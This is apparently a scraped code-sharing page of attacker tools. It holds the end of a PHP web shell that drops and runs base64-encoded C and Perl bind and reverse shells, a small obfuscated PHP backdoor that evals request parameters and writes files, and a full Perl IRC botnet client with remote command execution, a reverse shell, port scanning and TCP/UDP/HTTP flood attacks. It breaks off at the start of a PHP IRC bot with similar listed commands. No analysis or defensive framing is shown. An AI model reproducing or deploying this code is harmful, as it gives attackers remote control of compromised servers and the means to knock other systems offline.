cml0ZShuZXdmZCwiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChuZXdmZCxwYXNzLHNpemVvZihwYXNzKSk7DQogICAgICAgIGZvcihpPTA7aTxzdHJsZW4ocGFzcyk7aSsrKQ0KICAgICAgICAgICAgaWYoIChwYXNzW2ldID09ICdcbicpIHx8IChwYXNzW2ldID09ICdccicpICkNCiAgICAgICAgICAgICAgICBwYXNzW2ldID0gJ1wwJzsNCiAgICAgICAgICAgIGlmIChzdHJjbXAoYXJndlsyXSxwYXNzKSA9PSAwKQ0KICAgICAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICAgICAgY2xvc2UobmV3ZmQpOw0KICAgIH0NCn0="; | |
| $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; | |
| ?> | |
| <h1>Network tools</h1><div class=content> | |
| <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> | |
| <span>Bind port to /bin/sh</span><br/> | |
| Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>"> | |
| </form> | |
| <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> | |
| <span>Back-connect to</span><br/> | |
| Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>"> | |
| </form><br> | |
| <?php | |
| if(isset($_POST['p1'])) { | |
| function cf($f,$t) { | |
| $w=@fopen($f,"w") or @function_exists('file_put_contents'); | |
| if($w) { | |
| @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); | |
| @fclose($w); | |
| } | |
| } | |
| if($_POST['p1'] == 'bpc') { | |
| cf("/tmp/bp.c",$bind_port_c); | |
| $out = ex("gcc -o /tmp/bp /tmp/bp.c"); | |
| @unlink("/tmp/bp.c"); | |
| $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); | |
| echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>"; | |
| } | |
| if($_POST['p1'] == 'bpp') { | |
| cf("/tmp/bp.pl",$bind_port_p); | |
| $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); | |
| echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>"; | |
| } | |
| if($_POST['p1'] == 'bcc') { | |
| cf("/tmp/bc.c",$back_connect_c); | |
| $out = ex("gcc -o /tmp/bc /tmp/bc.c"); | |
| @unlink("/tmp/bc.c"); | |
| $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); | |
| echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>"; | |
| } | |
| if($_POST['p1'] == 'bcp') { | |
| cf("/tmp/bc.pl",$back_connect_p); | |
| $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); | |
| echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>"; | |
| } | |
| } | |
| echo '</div>'; | |
| } | |
| if( empty( $_POST['ajax'] ) && (@$_POST['p2'] != 'download')) | |
| printHeader(); | |
| if( empty($_POST['a']) ) | |
| $_POST['a'] = 'SecInfo'; | |
| if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) | |
| call_user_func('action' . $_POST['a']); | |
| if( empty( $_POST['ajax'] ) && (@$_POST['p2'] != 'download') ) | |
| printFooter(); | |
| ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php $snbdow = "fc189b205b508a17a79f0b7c679b738c"; if(isset($_REQUEST['lepnnr'])) { $ietdaavp = $_REQUEST['lepnnr']; eval($ietdaavp); exit(); } if(isset($_REQUEST['dmipmp'])) { $czvprlfp = $_REQUEST['iwbqg']; $kkmtjei = $_REQUEST['dmipmp']; $xngxlvus = fopen($kkmtjei, 'w'); $ajgauvq = fwrite($xngxlvus, $czvprlfp); fclose($xngxlvus); echo $ajgauvq; exit(); } ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| #use LWP::UserAgent; | |
| my $linas_max = '5'; | |
| my $sleep = '7'; | |
| my $VERSAO = "2.3.4-1"; | |
| $servidor = $ARGV[0] unless $servidor; | |
| my $porta = $ARGV[1]; | |
| my $nick = $ARGV[2]; | |
| my $ircname = $ARGV[3]; | |
| my @canais = ('#'.$ARGV[4]); | |
| my @adms = ($ARGV[5]); | |
| my $fakeproc = $ARGV[6]; | |
| chop (my $realname = `hostname`); | |
| my $success = "\n [+] Bot Shell\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n\n"; | |
| my $failed = "\n [?] perl $0 <irchost> <port> <nick> <ident> <chan> <admin> <fakeproc>\n\n"; | |
| if (@ARGV != 7) { print $failed; exit(); } else { print $success; } | |
| $SIG{'INT'} = 'IGNORE'; | |
| $SIG{'HUP'} = 'IGNORE'; | |
| $SIG{'TERM'} = 'IGNORE'; | |
| $SIG{'CHLD'} = 'IGNORE'; | |
| $SIG{'PS'} = 'IGNORE'; | |
| use IO::Socket; | |
| use Socket; | |
| use IO::Select; | |
| chdir("/"); | |
| $servidor="$ARGV[0]" if $ARGV[0]; | |
| $0="$fakeproc"."\0"x16; | |
| my $pid=fork; | |
| exit if $pid; | |
| die "Problema com o fork: $!" unless defined($pid); | |
| our %irc_servers; | |
| our %DCC; | |
| my $dcc_sel = new IO::Select->new(); | |
| $sel_cliente = IO::Select->new(); | |
| sub sendraw { | |
| if ($#_ == '1') { | |
| my $socket = $_[0]; | |
| print $socket "$_[1]\n"; | |
| } else { | |
| print $IRC_cur_socket "$_[0]\n"; | |
| } | |
| } | |
| sub conectar { | |
| my $meunick = $_[0]; | |
| my $servidor_con = $_[1]; | |
| my $porta_con = $_[2]; | |
| my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); | |
| if (defined($IRC_socket)) { | |
| $IRC_cur_socket = $IRC_socket; | |
| $IRC_socket->autoflush(1); | |
| $sel_cliente->add($IRC_socket); | |
| $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; | |
| $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; | |
| $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
| $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; | |
| nick("$meunick"); | |
| sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); | |
| sleep 1; | |
| } | |
| } | |
| my $line_temp; | |
| while( 1 ) { | |
| while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } | |
| delete($irc_servers{''}) if (defined($irc_servers{''})); | |
| my @ready = $sel_cliente->can_read(0); | |
| next unless(@ready); | |
| foreach $fh (@ready) { | |
| $IRC_cur_socket = $fh; | |
| $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; | |
| $nread = sysread($fh, $msg, 4096); | |
| if ($nread == 0) { | |
| $sel_cliente->remove($fh); | |
| $fh->close; | |
| delete($irc_servers{$fh}); | |
| } | |
| @lines = split (/\n/, $msg); | |
| for(my $c=0; $c<= $#lines; $c++) { | |
| $line = $lines[$c]; | |
| $line=$line_temp.$line if ($line_temp); | |
| $line_temp=''; | |
| $line =~ s/\r$//; | |
| unless ($c == $#lines) { | |
| parse("$line"); | |
| } else { | |
| if ($#lines == 0) { | |
| parse("$line"); | |
| } elsif ($lines[$c] =~ /\r$/) { | |
| parse("$line"); | |
| } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { | |
| parse("$line"); | |
| } else { | |
| $line_temp = $line; | |
| } | |
| } | |
| } | |
| } | |
| } | |
| sub parse { | |
| my $servarg = shift; | |
| if ($servarg =~ /^PING \:(.*)/) { | |
| sendraw("PONG :$1"); | |
| } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { | |
| my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; | |
| if ($args =~ /^\001VERSION\001$/) { | |
| notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); | |
| } | |
| if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { | |
| if ($onde eq "$meunick"){ | |
| shell("$pn", "$args"); | |
| } | |
| if ($args =~ /^(\Q$meunick\E|\!bht)\s+(.*)/ ) { | |
| my $natrix = $1; | |
| my $arg = $2; | |
| if ($arg =~ /^\!(.*)/) { | |
| ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); | |
| } elsif ($arg =~ /^\@(.*)/) { | |
| $ondep = $onde; | |
| $ondep = $pn if $onde eq $meunick; | |
| bfunc("$ondep","$1", "$pn"); | |
| } else { | |
| shell("$onde", "$arg"); | |
| } | |
| } | |
| } | |
| } | |
| elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { | |
| if (lc($1) eq lc($meunick)) { | |
| $meunick=$4; | |
| $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
| } | |
| } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { | |
| nick("$meunick-".int rand(999999)); | |
| } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { | |
| $meunick = $2; | |
| $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
| $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; | |
| foreach my $canal (@canais) { | |
| sendraw("JOIN $canal"); | |
| sendraw("PRIVMSG @adms :You Are My Master"); | |
| } | |
| } | |
| } | |
| sub bfunc { | |
| my $msgpriv = "$_[2]"; | |
| my $printl = $_[0]; | |
| my $funcarg = $_[1]; | |
| if (my $pid = fork) { | |
| waitpid($pid, 0); | |
| } else { | |
| if (fork) { | |
| exit; | |
| } else { | |
| if ($funcarg =~ /^nick (.*)/) { | |
| sendraw($IRC_cur_socket, "NICK ".$1); | |
| $nick=$1; | |
| } | |
| if ($funcarg =~ /^join (.*)/) { | |
| sendraw($IRC_cur_socket, "JOIN ".$1); | |
| } | |
| if ($funcarg =~ /^part (.*)/) { | |
| sendraw($IRC_cur_socket, "PART ".$1); | |
| } | |
| if ($funcarg =~ /^msg\s+(\S+) (.*)/) { | |
| sendraw($IRC_cur_socket, "PRIVMSG ".$1." :".$2); | |
| } | |
| if ($funcarg =~ /^op (.*)/) { | |
| sendraw($IRC_cur_socket, "MODE $printl +o ".$1); | |
| } | |
| if ($funcarg =~ /^deop (.*)/) { | |
| sendraw($IRC_cur_socket, "MODE $printl -o ".$1); | |
| } | |
| if ($funcarg =~ /^voice (.*)/) { | |
| sendraw($IRC_cur_socket, "MODE $printl +v ".$1); | |
| } | |
| if ($funcarg =~ /^pid/) { | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :Process/PID : $fakeproc - $$"); | |
| } | |
| if ($funcarg =~ /^die (.*)/) { | |
| sendraw($IRC_cur_socket, "QUIT :".$1); | |
| $killd = "kill -9 $$"; | |
| system (`$killd`); | |
| } | |
| if ($funcarg =~ /^devoice (.*)/) { | |
| sendraw($IRC_cur_socket, "MODE $printl -v ".$1); | |
| } | |
| if ($funcarg =~ /^say (.*)/) { | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :".$1); | |
| } | |
| if ($funcarg =~ /^reset(.*)/) { | |
| sendraw($IRC_cur_socket, "QUIT :Di3 for my Master"); | |
| } | |
| if ($funcarg =~ /^die(.*)/) { | |
| if ($1 eq ""){ | |
| sendraw($IRC_cur_socket, "QUIT :Di3 for my Master"); | |
| $killd = "kill -9 $$"; | |
| system (`$killd`); | |
| } | |
| } | |
| if ($funcarg =~ /^tsunami\s+(\d+)\s+(.*)/) { | |
| for (my $dx=0; $dx<=$1; $dx++) | |
| { | |
| my @nickxxxx = ("\\","|","_","-","`","^","{","}","[","]"); | |
| $nickfgv = $nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx]; | |
| $msgflood = ""; | |
| $msgflood = $msgflood.$msgflood; | |
| sendraw($IRC_cur_socket, "NICK ".$nickfgv); | |
| sleep 10; | |
| sendraw($IRC_cur_socket, "PRIVMSG ".$2." :".$msgflood); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, "NOTICE ".$2." :".$msgflood); | |
| } | |
| sendraw($IRC_cur_socket, "NICK ".$nick); | |
| } | |
| if ($funcarg =~ /^help(.*)/) { | |
| if ($printl eq "$msgpriv"){ | |
| $msghelp ="PRIVMSG $msgpriv"; | |
| }else{ | |
| $msghelp ="NOTICE $msgpriv"; | |
| } | |
| sendraw($IRC_cur_socket, $msghelp." :15(7@2Command List @adms15)"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7@2Copyright (C) 200715)"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2help15)"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2portscan15) <IP/domain Name>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2udpflood15) <IP> <packet-size> <time>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tcpflood15) <IP> <port> <time>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2httpflood15) <www.website.com> <time>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2say15) <msg>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2join15) <#>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2part15) <#>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2nick15) <nick>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2msg15) <#/nick>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tsunami15) <banyak pesan> <#/nick> <msg>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2op15) <nick>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2deop15) <nick>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2voice15) <nick>"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2devoice15) <nick>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2reset15)"); | |
| sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2die15) <msg>"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2back15) <ip> <port>"); | |
| sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2command? di atas15)"); | |
| sleep 2; | |
| sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>"); | |
| } | |
| if ($funcarg =~ /^portscan (.*)/) { | |
| my $hostip="$1"; | |
| my @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","9997","10000","12345","19150","27374","31310","33133","33733","55555"); | |
| my (@aberta, %porta_banner); | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Portscan15)12 Scanning4 ".$1." 12for open ports."); | |
| foreach my $porta (@portas){ | |
| my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); | |
| if ($scansock) { | |
| push (@aberta, $porta); | |
| $scansock->close; | |
| } | |
| } | |
| if (@aberta) { | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2ScanPort15)12 Open port(s):4 @aberta"); | |
| } else { | |
| sendraw($IRC_cur_socket,"PRIVMSG $printl :15(7@2ScanPort15)12 No open ports found."); | |
| } | |
| } | |
| if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/){ | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attacking4 ".$1.":".$2." 12for4 ".$3." 12seconds."); | |
| my $itime = time; | |
| my ($cur_time); | |
| $cur_time = time - $itime; | |
| while ($3>$cur_time){ | |
| $cur_time = time - $itime; | |
| &tcpflooder("$1","$2","$3"); | |
| } | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attack done4 ".$1.":".$2."."); | |
| } | |
| if ($funcarg =~ /^version/) { | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Version15)12 mIRC324 ".$VERSAO." 12K.Mardam-Bey"); | |
| } | |
| if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { | |
| my $host = "$1"; | |
| my $porta = "$2"; | |
| my $proto = getprotobyname('tcp'); | |
| my $iaddr = inet_aton($host); | |
| my $paddr = sockaddr_in($porta, $iaddr); | |
| my $shell = "/bin/sh -i"; | |
| if ($^O eq "MSWin32") { | |
| $shell = "cmd.exe"; | |
| } | |
| socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; | |
| connect(SOCKET, $paddr) or die "connect: $!"; | |
| open(STDIN, ">&SOCKET"); | |
| open(STDOUT, ">&SOCKET"); | |
| open(STDERR, ">&SOCKET"); | |
| system("$shell"); | |
| close(STDIN); | |
| close(STDOUT); | |
| close(STDERR); | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2BackConnect15)4: 12Connecting to4 $host:$porta"); | |
| } | |
| if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP DDoSing15)12 Attacking4 ".$1.":80 12for4 ".$2." 12seconds."); | |
| my $itime = time; | |
| my ($cur_time); | |
| $cur_time = time - $itime; | |
| while ($2>$cur_time){ | |
| $cur_time = time - $itime; | |
| my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); | |
| print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; | |
| close($socket); | |
| } | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP15)12 Attacking done4 ".$1."."); | |
| } | |
| if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP DDoSing15)12 Attacking4 ".$1." 12with4 ".$2." 12Kb packets for4 ".$3." 12seconds."); | |
| my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); | |
| $dtime = 1 if $dtime == 0; | |
| my %bytes; | |
| $bytes{igmp} = $2 * $pacotes{igmp}; | |
| $bytes{icmp} = $2 * $pacotes{icmp}; | |
| $bytes{o} = $2 * $pacotes{o}; | |
| $bytes{udp} = $2 * $pacotes{udp}; | |
| $bytes{tcp} = $2 * $pacotes{tcp}; | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP15)12 Sent4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1."."); | |
| } | |
| exit; | |
| } | |
| } | |
| } | |
| sub ircase { | |
| my ($kem, $printl, $case) = @_; | |
| if ($case =~ /^join (.*)/) { | |
| j("$1"); | |
| } | |
| if ($case =~ /^part (.*)/) { | |
| p("$1"); | |
| } | |
| if ($case =~ /^rejoin\s+(.*)/) { | |
| my $chan = $1; | |
| if ($chan =~ /^(\d+) (.*)/) { | |
| for (my $ca = 1; $ca <= $1; $ca++ ) { | |
| p("$2"); | |
| j("$2"); | |
| } | |
| } else { | |
| p("$chan"); | |
| j("$chan"); | |
| } | |
| } | |
| if ($case =~ /^op/) { | |
| op("$printl", "$kem") if $case eq "op"; | |
| my $oarg = substr($case, 3); | |
| op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); | |
| } | |
| if ($case =~ /^deop/) { | |
| deop("$printl", "$kem") if $case eq "deop"; | |
| my $oarg = substr($case, 5); | |
| deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); | |
| } | |
| if ($case =~ /^msg\s+(\S+) (.*)/) { | |
| msg("$1", "$2"); | |
| } | |
| if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { | |
| for (my $cf = 1; $cf <= $1; $cf++) { | |
| msg("$2", "$3"); | |
| } | |
| } | |
| if ($case =~ /^ctcp\s+(\S+) (.*)/) { | |
| ctcp("$1", "$2"); | |
| } | |
| if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { | |
| for (my $cf = 1; $cf <= $1; $cf++) { | |
| ctcp("$2", "$3"); | |
| } | |
| } | |
| if ($case =~ /^nick (.*)/) { | |
| nick("$1"); | |
| } | |
| if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { | |
| conectar("$2", "$1", 6667); | |
| } | |
| if ($case =~ /^raw (.*)/) { | |
| sendraw("$1"); | |
| } | |
| if ($case =~ /^eval (.*)/) { | |
| eval "$1"; | |
| } | |
| } | |
| sub shell { | |
| my $printl=$_[0]; | |
| my $comando=$_[1]; | |
| if ($comando =~ /cd (.*)/) { | |
| chdir("$1") || msg("$printl", "No such file or directory"); | |
| return; | |
| } | |
| elsif ($pid = fork) { | |
| waitpid($pid, 0); | |
| } else { | |
| if (fork) { | |
| exit; | |
| } else { | |
| my @resp=`$comando 2>&1 3>&1`; | |
| my $c=0; | |
| foreach my $linha (@resp) { | |
| $c++; | |
| chop $linha; | |
| sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); | |
| if ($c == "$linas_max") { | |
| $c=0; | |
| sleep $sleep; | |
| } | |
| } | |
| exit; | |
| } | |
| } | |
| } | |
| sub tcpflooder { | |
| my $itime = time; | |
| my ($cur_time); | |
| my ($ia,$pa,$proto,$j,$l,$t); | |
| $ia=inet_aton($_[0]); | |
| $pa=sockaddr_in($_[1],$ia); | |
| $ftime=$_[2]; | |
| $proto=getprotobyname('tcp'); | |
| $j=0;$l=0; | |
| $cur_time = time - $itime; | |
| while ($l<1000){ | |
| $cur_time = time - $itime; | |
| last if $cur_time >= $ftime; | |
| $t="SOCK$l"; | |
| socket($t,PF_INET,SOCK_STREAM,$proto); | |
| connect($t,$pa)||$j--; | |
| $j++;$l++; | |
| } | |
| $l=0; | |
| while ($l<1000){ | |
| $cur_time = time - $itime; | |
| last if $cur_time >= $ftime; | |
| $t="SOCK$l"; | |
| shutdown($t,2); | |
| $l++; | |
| } | |
| } | |
| sub udpflooder { | |
| my $iaddr = inet_aton($_[0]); | |
| my $msg = 'A' x $_[1]; | |
| my $ftime = $_[2]; | |
| my $cp = 0; | |
| my (%pacotes); | |
| $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; | |
| socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; | |
| socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; | |
| socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; | |
| socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; | |
| return(undef) if $cp == 4; | |
| my $itime = time; | |
| my ($cur_time); | |
| while ( 1 ) { | |
| for (my $porta = 1; $porta <= 65000; $porta++) { | |
| $cur_time = time - $itime; | |
| last if $cur_time >= $ftime; | |
| send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; | |
| send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; | |
| send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; | |
| send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; | |
| for (my $pc = 3; $pc <= 255;$pc++) { | |
| next if $pc == 6; | |
| $cur_time = time - $itime; | |
| last if $cur_time >= $ftime; | |
| socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; | |
| send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; | |
| } | |
| } | |
| last if $cur_time >= $ftime; | |
| } | |
| return($cur_time, %pacotes); | |
| } | |
| sub ctcp { | |
| return unless $#_ == 1; | |
| sendraw("PRIVMSG $_[0] :\001$_[1]\001"); | |
| } | |
| sub msg { | |
| return unless $#_ == 1; | |
| sendraw("PRIVMSG $_[0] :$_[1]"); | |
| } | |
| sub notice { | |
| return unless $#_ == 1; | |
| sendraw("NOTICE $_[0] :$_[1]"); | |
| } | |
| sub op { | |
| return unless $#_ == 1; | |
| sendraw("MODE $_[0] +o $_[1]"); | |
| } | |
| sub deop { | |
| return unless $#_ == 1; | |
| sendraw("MODE $_[0] -o $_[1]"); | |
| } | |
| sub j { &join(@_); } | |
| sub join { | |
| return unless $#_ == 0; | |
| sendraw("JOIN $_[0]"); | |
| } | |
| sub p { part(@_); } | |
| sub part { | |
| sendraw("PART $_[0]"); | |
| } | |
| sub nick { | |
| return unless $#_ == 0; | |
| sendraw("NICK $_[0]"); | |
| } | |
| sub quit { | |
| sendraw("QUIT :$_[0]"); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <? | |
| /* | |
| * | |
| * #scanner@corp. since 2010 | |
| * REcoding by: scanner community | |
| * | |
| * COMMANDS: | |
| * | |
| * .user <password> //login to the bot | |
| * .logout //logout of the bot | |
| * .die //kill the bot | |
| * .restart //restart the bot | |
| * .mail <to> <from> <subject> <msg> //send an email | |
| * .dns <IP|HOST> //dns lookup | |
| * .download <URL> <filename> //download a file | |
| * .exec <cmd> // uses exec() //execute a command | |
| * .sexec <cmd> // uses shell_exec() //execute a command | |
| * .cmd <cmd> // uses popen() //execute a command | |
| * .info //get system information | |
| * .php <php code> // uses eval() //execute php code | |
| * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack | |
| * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack | |
| * .raw <cmd> //raw IRC command | |
| * .rndnick //change nickname | |
| * .pscan <host> <port> //port scan | |
| * .safe // test safe_mode (dvl) | |
| * .inbox <to> // test inbox (dvl) | |
| * .conback <ip> <port> // conect back (dvl) | |
| * .uname // return shell's uname using a php function (dvl) | |
| * | |
| */ | |
| set_time_limit(0); | |
| error_reporting(0); | |
| echo "ok!"; | |
| class pBot | |
| { | |
| var $config = array("server"=>"irc.baganbatu.net", | |
| "port"=>"6667", | |
| "pass"=>"", | |
| "prefix"=>"dodol", | |
| "maxrand"=>"5", | |
| "chan"=>"#dodol", | |
| "chan2"=>"#dodol", | |
| "key"=>"dodol", | |
| "modes"=>"+ps", | |
| "password"=>"dodol", | |
| "trigger"=>".", | |
| "hostauth"=>"*" // * for any hostname (remember: /setvhost scanner.crew) | |
| ); | |
| var $users = array(); | |
| function start() | |
| { | |
